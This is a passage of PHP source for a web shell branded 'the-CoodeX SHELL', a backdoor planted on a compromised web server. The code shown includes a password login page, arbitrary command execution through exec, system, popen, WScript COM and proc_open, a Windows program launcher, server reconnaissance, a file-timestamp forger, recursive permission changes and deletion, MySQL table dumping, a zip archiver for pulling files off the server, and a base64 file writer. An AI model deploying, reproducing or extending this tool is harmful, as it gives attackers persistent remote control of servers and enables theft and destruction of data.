1410 makeinput(array('title' => 'Alter file', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1411 makeinput(array('title' => 'Reference file (fullpath)', 'name' => 'tarfile', 'size' => 120, 'newline' => 1));
1412 formfooter();
1413 formhead(array('title' => 'Set last modified'));
1414 makehide('action', 'file');
1415 makehide('dir', $nowpath);
1416 makeinput(array('title' => 'Current file (fullpath)', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1417 p('<p>Instead »');
1418 p('year:');
1419 makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4));
1420 p('month:');
1421 makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2));
1422 p('day:');
1423 makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2));
1424 p('hour:');
1425 makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2));
1426 p('minute:');
1427 makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2));
1428 p('second:');
1429 makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2));
1430 p('</p>');
1431 formfooter();
1432} //end newtime
1433elseif ($action == 'shell') {
1434 if (IS_WIN && IS_COM) {
1435 if ($program && $parameter) {
1436 $shell = new COM('Shell.Application');
1437 $a = $shell->ShellExecute($program, $parameter);
1438 m('Program run has ' . (!$a ? 'success' : 'fail'));
1439 }
1440 !$program && $program = 'c:\windows\system32\cmd.exe';
1441 !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt';
1442 formhead(array('title' => 'Execute Program'));
1443 makehide('action', 'shell');
1444 makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1));
1445 p('<p>');
1446 makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter));
1447 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1448 p('</p>');
1449 formfoot();
1450 }
1451 formhead(array('title' => 'Execute Command'));
1452 makehide('action', 'shell');
1453 if (IS_WIN && IS_COM) {
1454 $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
1455 makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
1456 }
1457 p('<p>');
1458 makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command));
1459 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1460 p('</p>');
1461 formfoot();
1462 if ($command) {
1463 p('<hr width="100%" noshade /><pre>');
1464 if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
1465 $wsh = new COM('WScript.shell');
1466 $exec = $wsh->exec('cmd.exe /c ' . $command);
1467 $stdout = $exec->StdOut();
1468 $stroutput = $stdout->ReadAll();
1469 echo $stroutput;
1470 } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
1471 $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
1472 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1473 if (is_resource($process)) {
1474 fwrite($pipes[0], $command . "\r\n");
1475 fwrite($pipes[0], "exit\r\n");
1476 fclose($pipes[0]);
1477 while (!feof($pipes[1])) {
1478 echo fgets($pipes[1], 1024);
1479 }
1480 fclose($pipes[1]);
1481 while (!feof($pipes[2])) {
1482 echo fgets($pipes[2], 1024);
1483 }
1484 fclose($pipes[2]);
1485 proc_close($process);
1486 }
1487 } else {
1488 echo (execute($command));
1489 }
1490 p('</pre>');
1491 }
1492} //end shell
1493elseif ($action == 'phpenv') {
1494 $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1495 $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1496 !$dis_func && $dis_func = 'No';
1497 $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),);
1498 if ($phpvarname) {
1499 m($phpvarname . ' : ' . getcfg($phpvarname));
1500 }
1501 formhead(array('title' => 'Server environment'));
1502 makehide('action', 'phpenv');
1503 makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1));
1504 formfooter();
1505 $hp = array(0 => 'Server', 1 => 'PHP');
1506 for ($a = 0;$a < 2;$a++) {
1507 p('<h2>' . $hp[$a] . ' »</h2>');
1508 p('<ul class="info">');
1509 if ($a == 0) {
1510 for ($i = 1;$i <= 9;$i++) {
1511 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1512 }
1513 } elseif ($a == 1) {
1514 for ($i = 10;$i <= 23;$i++) {
1515 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1516 }
1517 }
1518 p('</ul>');
1519 }
1520} //end phpenv
1521else {
1522 m('Undefined Action');
1523}
1524?>
1525</td></tr></table>
1526<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1527 <span style="float:right;"><?php debuginfo();
1528ob_end_flush(); ?></span>
1529 Copyright (C) 2010-2011 <B>[Alibdaer - CoodeX]</B> - Develop by <a href=spamhacker2015@gmail.com
1530/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ target=_blank><B>the-CoodeX</B></a> - <B>https://www.facebook.com/ali.bdaer.hacker</B> All Rights Reserved.
1531</div>
1532</body>
1533</html>
1534
1535<?php
1536/*======================================================
1537Show info shell
1538======================================================*/
1539function m($msg) {
1540 echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1541 echo $msg;
1542 echo '</div>';
1543}
1544function scookie($key, $value, $life = 0, $prefix = 1) {
1545 global $admin, $timestamp, $_SERVER;
1546 $key = ($prefix ? $admin['cookiepre'] : '') . $key;
1547 $life = $life ? $life : $admin['cookielife'];
1548 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1549 setcookie($key, $value, $timestamp + $life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1550}
1551function multi($num, $perpage, $curpage, $tablename) {
1552 $multipage = '';
1553 if ($num > $perpage) {
1554 $page = 10;
1555 $offset = 5;
1556 $pages = @ceil($num / $perpage);
1557 if ($page > $pages) {
1558 $from = 1;
1559 $to = $pages;
1560 } else {
1561 $from = $curpage - $offset;
1562 $to = $curpage + $page - $offset - 1;
1563 if ($from < 1) {
1564 $to = $curpage + 1 - $from;
1565 $from = 1;
1566 if (($to - $from) < $page && ($to - $from) < $pages) {
1567 $to = $page;
1568 }
1569 } elseif ($to > $pages) {
1570 $from = $curpage - $pages + $to;
1571 $to = $pages;
1572 if (($to - $from) < $page && ($to - $from) < $pages) {
1573 $from = $pages - $page + 1;
1574 }
1575 }
1576 }
1577 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', 1);">First</a> ' : '') . ($curpage > 1 ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage - 1) . ');">Prev</a> ' : '');
1578 for ($i = $from;$i <= $to;$i++) {
1579 $multipage.= $i == $curpage ? $i . ' ' : '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $i . ');">[' . $i . ']</a> ';
1580 }
1581 $multipage.= ($curpage < $pages ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage + 1) . ');">Next</a>' : '') . ($to < $pages ? ' <a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $pages . ');">Last</a>' : '');
1582 $multipage = $multipage ? '<p>Pages: ' . $multipage . '</p>' : '';
1583 }
1584 return $multipage;
1585}
1586// Login page
1587function loginpage() {
1588?>
1589<html>
1590<head>
1591
1592<body bgcolor=black>
1593
1594 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1595<title>the-CoodeX SHELL - Develop by the-CoodeX</title>
1596<style type="text/css">
1597A:link {text-decoration: none; color: green }
1598A:visited {text-decoration: none;color:red}
1599A:active {text-decoration: none}
1600A:hover {text-decoration: underline; color: green;}
1601input, textarea, button
1602{
1603 font-size: 9pt;
1604 color: #ccc;
1605 font-family: verdana, sans-serif;
1606 background-color: #202020;
1607 border-left: 1px solid #74A202;
1608 border-top: 1px solid #74A202;
1609 border-right: 1px solid #74A202;
1610 border-bottom: 1px solid #74A202;
1611}
1612
1613</style>
1614
1615 <BR><BR>
1616<div align=center >
1617<fieldset style="border: 1px solid rgb(69, 69, 69); padding: 4px;width:450px;bgcolor:white;align:center;font-family:tahoma;font-size:10pt"><legend><font color=red><B>Login</b></font></legend>
1618
1619<div>
1620<font color=gray>
1621<font color=yellow>==[ <B>the-CoodeX SHELL</B> ]== </font><BR><BR>
1622
1623<form method="POST" action="">
1624 <span style="font:10pt tahoma;">Password: </span><input name="password" type="password" size="20">
1625 <input type="hidden" name="doing" value="login">
1626 <input type="submit" value="Login">
1627 </form>
1628<BR>
1629<?php
1630 echo "" . $err_mess . "";
1631?>
1632
1633 <B><font color=red>
1634<a href=https://www.facebook.com/ali.bdaer.hacker target=_blank>my page facebook</a><BR></b>
1635
1636
1637
1638
1639
1640</div>
1641
1642
1643 </fieldset>
1644
1645
1646
1647</head>
1648</html>
1649
1650
1651<?php
1652 exit;
1653} //end loginpage()
1654function execute($cfe) {
1655 $res = '';
1656 if ($cfe) {
1657 if (function_exists('exec')) {
1658 @exec($cfe, $res);
1659 $res = join("\n", $res);
1660 } elseif (function_exists('shell_exec')) {
1661 $res = @shell_exec($cfe);
1662 } elseif (function_exists('system')) {
1663 @ob_start();
1664 @system($cfe);
1665 $res = @ob_get_contents();
1666 @ob_end_clean();
1667 } elseif (function_exists('passthru')) {
1668 @ob_start();
1669 @passthru($cfe);
1670 $res = @ob_get_contents();
1671 @ob_end_clean();
1672 } elseif (@is_resource($f = @popen($cfe, "r"))) {
1673 $res = '';
1674 while (!@feof($f)) {
1675 $res.= @fread($f, 1024);
1676 }
1677 @pclose($f);
1678 }
1679 }
1680 return $res;
1681}
1682function which($pr) {
1683 $path = execute("which $pr");
1684 return ($path ? $path : $pr);
1685}
1686function cf($fname, $text) {
1687 if ($fp = @fopen($fname, 'w')) {
1688 @fputs($fp, base64_decode($text));
1689 @fclose($fp);
1690 }
1691}
1692// Debug
1693function debuginfo() {
1694 global $starttime;
1695 $mtime = explode(' ', microtime());
1696 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1697 echo 'Processed in ' . $totaltime . ' second(s)';
1698}
1699// Function connect database
1700function dbconn($dbhost, $dbuser, $dbpass, $dbname = '', $charset = '', $dbport = '3306') {
1701 if (!$link = @mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpass)) {
1702 p('<h2>Can not connect to MySQL server</h2>');
1703 exit;
1704 }
1705 if ($link && $dbname) {
1706 if (!@mysql_select_db($dbname, $link)) {
1707 p('<h2>Database selected has error</h2>');
1708 exit;
1709 }
1710 }
1711 if ($link && mysql_get_server_info() > '4.1') {
1712 if (in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1713 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1714 }
1715 }
1716 return $link;
1717}
1718// Array strip
1719function s_array(&$array) {
1720 if (is_array($array)) {
1721 foreach ($array as $k => $v) {
1722 $array[$k] = s_array($v);
1723 }
1724 } else if (is_string($array)) {
1725 $array = stripslashes($array);
1726 }
1727 return $array;
1728}
1729// HTML Strip
1730function html_clean($content) {
1731 $content = htmlspecialchars($content);
1732 $content = str_replace("\n", "<br />", $content);
1733 $content = str_replace(" ", " ", $content);
1734 $content = str_replace("\t", " ", $content);
1735 return $content;
1736}
1737// Chmod
1738function getChmod($filepath) {
1739 return substr(base_convert(@fileperms($filepath), 10, 8), -4);
1740}
1741function getPerms($filepath) {
1742 $mode = @fileperms($filepath);
1743 if (($mode & 0xC000) === 0xC000) {
1744 $type = 's';
1745 } elseif (($mode & 0x4000) === 0x4000) {
1746 $type = 'd';
1747 } elseif (($mode & 0xA000) === 0xA000) {
1748 $type = 'l';
1749 } elseif (($mode & 0x8000) === 0x8000) {
1750 $type = '-';
1751 } elseif (($mode & 0x6000) === 0x6000) {
1752 $type = 'b';
1753 } elseif (($mode & 0x2000) === 0x2000) {
1754 $type = 'c';
1755 } elseif (($mode & 0x1000) === 0x1000) {
1756 $type = 'p';
1757 } else {
1758 $type = '?';
1759 }
1760 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1761 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1762 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1763 $group['read'] = ($mode & 00040) ? 'r' : '-';
1764 $group['write'] = ($mode & 00020) ? 'w' : '-';
1765 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1766 $world['read'] = ($mode & 00004) ? 'r' : '-';
1767 $world['write'] = ($mode & 00002) ? 'w' : '-';
1768 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1769 if ($mode & 0x800) {
1770 $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
1771 }
1772 if ($mode & 0x400) {
1773 $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
1774 }
1775 if ($mode & 0x200) {
1776 $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';
1777 }
1778 return $type . $owner['read'] . $owner['write'] . $owner['execute'] . $group['read'] . $group['write'] . $group['execute'] . $world['read'] . $world['write'] . $world['execute'];
1779}
1780function getUser($filepath) {
1781 if (function_exists('posix_getpwuid')) {
1782 $array = @posix_getpwuid(@fileowner($filepath));
1783 if ($array && is_array($array)) {
1784 return ' / <a href="#" title="User: ' . $array['name'] . '
Passwd: ' . $array['passwd'] . '
Uid: ' . $array['uid'] . '
gid: ' . $array['gid'] . '
Gecos: ' . $array['gecos'] . '
Dir: ' . $array['dir'] . '
Shell: ' . $array['shell'] . '">' . $array['name'] . '</a>';
1785 }
1786 }
1787 return '';
1788}
1789// Delete dir
1790function deltree($deldir) {
1791 $mydir = @dir($deldir);
1792 while ($file = $mydir->read()) {
1793 if ((is_dir($deldir . '/' . $file)) && ($file != '.') && ($file != '..')) {
1794 @chmod($deldir . '/' . $file, 0777);
1795 deltree($deldir . '/' . $file);
1796 }
1797 if (is_file($deldir . '/' . $file)) {
1798 @chmod($deldir . '/' . $file, 0777);
1799 @unlink($deldir . '/' . $file);
1800 }
1801 }
1802 $mydir->close();
1803 @chmod($deldir, 0777);
1804 return @rmdir($deldir) ? 1 : 0;
1805}
1806// Background
1807function bg() {
1808 global $bgc;
1809 return ($bgc++ % 2 == 0) ? 'alt1' : 'alt2';
1810}
1811// Get path
1812function getPath($scriptpath, $nowpath) {
1813 if ($nowpath == '.') {
1814 $nowpath = $scriptpath;
1815 }
1816 $nowpath = str_replace('\\', '/', $nowpath);
1817 $nowpath = str_replace('//', '/', $nowpath);
1818 if (substr($nowpath, -1) != '/') {
1819 $nowpath = $nowpath . '/';
1820 }
1821 return $nowpath;
1822}
1823// Get up path
1824function getUpPath($nowpath) {
1825 $pathdb = explode('/', $nowpath);
1826 $num = count($pathdb);
1827 if ($num > 2) {
1828 unset($pathdb[$num - 1], $pathdb[$num - 2]);
1829 }
1830 $uppath = implode('/', $pathdb) . '/';
1831 $uppath = str_replace('//', '/', $uppath);
1832 return $uppath;
1833}
1834// Config
1835function getcfg($varname) {
1836 $result = get_cfg_var($varname);
1837 if ($result == 0) {
1838 return 'No';
1839 } elseif ($result == 1) {
1840 return 'Yes';
1841 } else {
1842 return $result;
1843 }
1844}
1845// Function name
1846function getfun($funName) {
1847 return (false !== function_exists($funName)) ? 'Yes' : 'No';
1848}
1849function GetList($dir) {
1850 global $dirdata, $j, $nowpath;
1851 !$j && $j = 1;
1852 if ($dh = opendir($dir)) {
1853 while ($file = readdir($dh)) {
1854 $f = str_replace('//', '/', $dir . '/' . $file);
1855 if ($file != '.' && $file != '..' && is_dir($f)) {
1856 if (is_writable($f)) {
1857 $dirdata[$j]['filename'] = str_replace($nowpath, '', $f);
1858 $dirdata[$j]['mtime'] = @date('Y-m-d H:i:s', filemtime($f));
1859 $dirdata[$j]['dirchmod'] = getChmod($f);
1860 $dirdata[$j]['dirperm'] = getPerms($f);
1861 $dirdata[$j]['dirlink'] = ue($dir);
1862 $dirdata[$j]['server_link'] = $f;
1863 $dirdata[$j]['client_link'] = ue($f);
1864 $j++;
1865 }
1866 GetList($f);
1867 }
1868 }
1869 closedir($dh);
1870 clearstatcache();
1871 return $dirdata;
1872 } else {
1873 return array();
1874 }
1875}
1876function qy($sql) {
1877 //echo $sql.'<br>';
1878 $res = $error = '';
1879 if (!$res = @mysql_query($sql)) {
1880 return 0;
1881 } else if (is_resource($res)) {
1882 return 1;
1883 } else {
1884 return 2;
1885 }
1886 return 0;
1887}
1888function q($sql) {
1889 return @mysql_query($sql);
1890}
1891function fr($qy) {
1892 mysql_free_result($qy);
1893}
1894function sizecount($size) {
1895 if ($size > 1073741824) {
1896 $size = round($size / 1073741824 * 100) / 100 . ' G';
1897 } elseif ($size > 1048576) {
1898 $size = round($size / 1048576 * 100) / 100 . ' M';
1899 } elseif ($size > 1024) {
1900 $size = round($size / 1024 * 100) / 100 . ' K';
1901 } else {
1902 $size = $size . ' B';
1903 }
1904 return $size;
1905}
1906// Zip
1907class PHPZip {
1908 var $out = '';
1909 function PHPZip($dir) {
1910 if (@function_exists('gzcompress')) {
1911 $curdir = getcwd();
1912 if (is_array($dir)) $filelist = $dir;
1913 else {
1914 $filelist = $this->GetFileList($dir); //File list
1915 foreach ($filelist as $k => $v) $filelist[] = substr($v, strlen($dir) + 1);
1916 }
1917 if ((!empty($dir)) && (!is_array($dir)) && (file_exists($dir))) chdir($dir);
1918 else chdir($curdir);
1919 if (count($filelist) > 0) {
1920 foreach ($filelist as $filename) {
1921 if (is_file($filename)) {
1922 $fd = fopen($filename, 'r');
1923 $content = @fread($fd, filesize($filename));
1924 fclose($fd);
1925 if (is_array($dir)) $filename = basename($filename);
1926 $this->addFile($content, $filename);
1927 }
1928 }
1929 $this->out = $this->file();
1930 chdir($curdir);
1931 }
1932 return 1;
1933 } else return 0;
1934 }
1935 // Show file list
1936 function GetFileList($dir) {
1937 static $a;
1938 if (is_dir($dir)) {
1939 if ($dh = opendir($dir)) {
1940 while ($file = readdir($dh)) {
1941 if ($file != '.' && $file != '..') {
1942 $f = $dir . '/' . $file;
1943 if (is_dir($f)) $this->GetFileList($f);
1944 $a[] = $f;
1945 }
1946 }
1947 closedir($dh);
1948 }
1949 }
1950 return $a;
1951 }
1952 var $datasec = array();
1953 var $ctrl_dir = array();
1954 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
1955 var $old_offset = 0;
1956 function unix2DosTime($unixtime = 0) {
1957 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
1958 if ($timearray['year'] < 1980) {
1959 $timearray['year'] = 1980;
1960 $timearray['mon'] = 1;
1961 $timearray['mday'] = 1;
1962 $timearray['hours'] = 0;
1963 $timearray['minutes'] = 0;
1964 $timearray['seconds'] = 0;
1965 } // end if
1966 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
1967 }
1968 function addFile($data, $name, $time = 0) {
1969 $name = str_replace('\\', '/', $name);
1970 $dtime = dechex($this->unix2DosTime($time));
1971 $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
1972 eval('$hexdtime = "' . $hexdtime . '";');
1973 $fr = "\x50\x4b\x03\x04";
1974 $fr.= "\x14\x00";
1975 $fr.= "\x00\x00";
1976 $fr.= "\x08\x00";
1977 $fr.= $hexdtime;
1978 $unc_len = strlen($data);
1979 $crc = crc32($data);
1980 $zdata = gzcompress($data);
1981 $c_len = strlen($zdata);
1982 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1983 $fr.= pack('V', $crc);
1984 $fr.= pack('V', $c_len);
1985 $fr.= pack('V', $unc_len);
1986 $fr.= pack('v', strlen($name));
1987 $fr.= pack('v', 0);
1988 $fr.= $name;
1989 $fr.= $zdata;
1990 $fr.= pack('V', $crc);
1991 $fr.= pack('V', $c_len);
1992 $fr.= pack('V', $unc_len);
1993 $this->datasec[] = $fr;
1994 $new_offset = strlen(implode('', $this->datasec));
1995 $cdrec = "\x50\x4b\x01\x02";
1996 $cdrec.= "\x00\x00";
1997 $cdrec.= "\x14\x00";
1998 $cdrec.= "\x00\x00";
1999 $cdrec.= "\x08\x00";
2000 $cdrec.= $hexdtime;
2001 $cdrec.= pack('V', $crc);
2002 $cdrec.= pack('V', $c_len);
2003 $cdrec.= pack('V', $unc_len);
2004 $cdrec.= pack('v', strlen($name));
2005 $cdrec.= pack('v', 0);
2006 $cdrec.= pack('v', 0);
2007 $cdrec.= pack('v', 0);
2008 $cdrec.= pack('v', 0);
2009 $cdrec.= pack('V', 32);
2010 $cdrec.= pack('V', $this->old_offset);
2011 $this->old_offset = $new_offset;
2012 $cdrec.= $name;
2013 $this->ctrl_dir[] = $cdrec;
2014 }
2015 function file() {
2016 $data = implode('', $this->datasec);
2017 $ctrldir = implode('', $this->ctrl_dir);
2018 return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
2019 }
2020}
2021// Dump mysql
2022function sqldumptable($table, $fp = 0) {
2023 $tabledump = "DROP TABLE IF EXISTS $table;\n";
2024 $tabledump.= "CREATE TABLE $table (\n";
2025 $firstfield = 1;
2026 $fields = q("SHOW FIELDS FROM $table");
2027 while ($field = mysql_fetch_array($fields)) {
2028 if (!$firstfield) {
2029 $tabledump.= ",\n";
2030 } else {
2031 $firstfield = 0;
2032 }
2033 $tabledump.= " $field[Field] $field[Type]";
2034 if (!empty($field["Default"])) {
2035 $tabledump.= " DEFAULT '$field[Default]'";
2036 }
2037 if ($field['Null'] != "YES") {
2038 $tabledump.= " NOT NULL";
2039 }
2040 if ($field['Extra'] != "") {
2041 $tabledump.= " $field[Extra]";
2042 }
2043 }
2044 fr($fields);
2045 $keys = q("SHOW KEYS FROM $table");
2046 while ($key = mysql_fetch_array($keys)) {
2047 $kname = $key['Key_name'];
2048 if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2049 $kname = "UNIQUE|$kname";
2050 }
2051 if (!is_array($index[$kname])) {
2052 $index[$kname] = array();
2053 }
2054 $index[$kname][] = $key['Column_name'];
2055 }
2056 fr($keys);
2057 while (list($kname, $columns) = @each($index)) {
2058 $tabledump.= ",\n";
2059 $colnames = implode($columns, ",");
2060 if ($kname == "PRIMARY") {
2061 $tabledump.= " PRIMARY KEY ($colnames)";
2062 } else {
2063 if (substr($kname, 0, 6) == "UNIQUE") {
2064 $kname = substr($kname, 7);
2065 }
2066 $tabledump.= " KEY $kname ($colnames)";
2067 }
2068 }
2069 $tabledump.= "\n);\n\n";
2070 if ($fp) {
2071 fwrite($fp, $tabledump);
2072 } else {
2073 echo $tabledump;
2074 }
2075 $rows = q("SELECT * FROM $table");
2076 $numfields = mysql_num_fields($rows);
2077 while ($row = mysql_fetch_array($rows)) {
2078 $tabledump = "INSERT INTO $table VALUES(";
2079 $fieldcounter = - 1;
2080 $firstfield = 1;
2081 while (++$fieldcounter < $numfields) {
2082 if (!$firstfield) {
2083 $tabledump.= ", ";
2084 } else {
2085 $firstfield = 0;
2086 }
2087 if (!isset($row[$fieldcounter])) {
2088 $tabledump.= "NULL";
2089 } else {
2090 $tabledump.= "'" . mysql_escape_string($row[$fieldcounter]) . "'";
2091 }
2092 }
2093 $tabledump.= ");\n";
2094 if ($fp) {
2095 fwrite($fp, $tabledump);
2096 } else {
2097 echo $tabledump;
2098 }
2099 }
2100 fr($rows);
2101 if ($fp) {
2102 fwrite($fp, "\n");
2103 } else {
2104 echo "\n";
2105 }
2106}
2107function ue($str) {
2108 return urlencode($str);
2109}
2110function p($str) {
2111 echo $str . "\n";
2112}
2113function tbhead() {
2114 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2115}
2116function tbfoot() {
2117 p('</table>');
2118}
2119function makehide($name, $value = '') {
2120 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2121}
2122function makeinput($arg = array()) {
2123 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2124 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2125 !$arg['type'] && $arg['type'] = 'text';
2126 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2127 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2128 if ($arg['newline']) {
2129 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2130 } else {
2131 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2132 }
2133}
2134function makeselect($arg = array()) {
2135 if ($arg['onchange']) {
2136 $onchange = 'onchange="' . $arg['onchange'] . '"';
2137 }
2138 $arg['title'] = $arg['title'] ? $arg['title'] : '';
2139 if ($arg['newline']) p('<p>');
2140 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2141 if (is_array($arg['option'])) {
2142 foreach ($arg['option'] as $key => $value) {
2143 if ($arg['selected'] == $key) {
2144 p("<option value=\"$key\" selected>$value</option>");
2145 } else {
2146 p("<option value=\"$key\">$value</option>");
2147 }
2148 }
2149 }
2150 p("</select>");
2151 if ($arg['newline']) p('</p>');
2152}
2153function formhead($arg = array()) {
2154 !$arg['method'] && $arg['method'] = 'post';
2155 !$arg['action'] && $arg['action'] = $self;
2156 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2157 !$arg['name'] && $arg['name'] = 'form1';
2158 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2159 if ($arg['title']) {
2160 p('<h2>' . $arg['title'] . ' »</h2>');
2161 }
2162}
2163function maketext($arg = array()) {
2164 !$arg['cols'] && $arg['cols'] = 100;
2165 !$arg['rows'] && $arg['rows'] = 25;
2166 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2167 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2168}
2169function formfooter($name = '') {
2170 !$name && $name = 'submit';
2171 p('<p><input class="bt" name="' . $name . '" id=\"' . $name . '\" type="submit" value="Submit"></p>');
2172 p('</form>');
2173}
2174function formfoot() {
2175 p('</form>');
2176}
2177// Exit
2178function pr($a) {
2179 echo '<pre>';
2180 print_r($a);
2181 echo '</pre>';
2182}
2183?>
2184>